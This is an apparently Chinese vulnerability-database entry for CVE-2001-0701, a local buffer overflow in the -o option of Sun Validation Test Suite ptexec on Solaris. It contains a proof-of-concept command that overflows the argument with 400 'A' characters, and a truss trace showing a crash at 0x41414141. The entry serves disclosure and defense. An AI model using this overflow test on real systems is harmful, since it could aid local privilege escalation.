Sun Validation Test Suite ptexec缓冲区溢出漏洞

Sun Validation Test Suite ptexec缓冲区溢出漏洞

漏洞ID 1106406 漏洞类型 缓冲区溢出
发布时间 2001-06-21 更新时间 2005-05-02
图片[1]-Sun Validation Test Suite ptexec缓冲区溢出漏洞-安全小百科CVE编号 CVE-2001-0701
图片[2]-Sun Validation Test Suite ptexec缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200109-119
漏洞平台 Solaris CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/20945
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200109-119
|漏洞详情
SunValidationTestSuite4.3以及之前版本ptexec存在缓冲区溢出漏洞。本地用户借助超长-o参数提升特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/2898/info

SunVTS is the Sun Validation Test Suite, distributed and maintained by Sun Microsystems. The SunVTS is used to test various components of OEM Sun hardware, and can also be used to stress-test components and sub-components.

A buffer overflow in the -o of the ptexec command exists. It is possible for a local user to overwrite stack memory, including the return address.

This makes it possible for a local user to gain elevated privileges, and potentially full administrative access. 

# > .sunvts_sec_gss
# /opt/SUNWvts/bin/ptexec -o `perl -e 'print "A"x400'`
Segmentation Fault (core dumped)

# truss /opt/SUNWvts/bin/ptexec -o `perl -e 'print "A"x400'`

execve("/opt/SUNWvts/bin/ptexec", 0xFFBEFA44, 0xFFBEFA54) argc = 3
stat("/opt/SUNWvts/bin/ptexec", 0xFFBEF780) = 0
open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT
open("/usr/lib/librpcsvc.so.1", O_RDONLY) = 3
fstat(3, 0xFFBEF518) = 0
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF3A0000

[.....]

sigprocmask(SIG_SETMASK, 0xFF23F010, 0x00000000) = 0
sigaction(SIGSEGV, 0xFFBEE388, 0x00000000) = 0
sigprocmask(SIG_SETMASK, 0xFF24ADE0, 0x00000000) = 0
setcontext(0xFFBEE248)
Incurred fault #6, FLTBOUNDS %pc = 0xFF139FF0
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
*** process killed ***
|参考资料

来源:XF
名称:sunvts-ptexec-bo(6736)
链接:http://xforce.iss.net/static/6736.php
来源:BID
名称:2898
链接:http://www.securityfocus.com/bid/2898
来源:BUGTRAQ
名称:20010621Solaris/opt/SUNWvts/bin/ptexecVulnerability
链接:http://www.securityfocus.com/archive/1/192667

相关推荐: Linux Kernel SYS_IA32.C Unspecified Buffer Overflow Vulnerability

Linux Kernel SYS_IA32.C Unspecified Buffer Overflow Vulnerability 漏洞ID 1097605 漏洞类型 Boundary Condition Error 发布时间 2004-11-29 更新时间 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享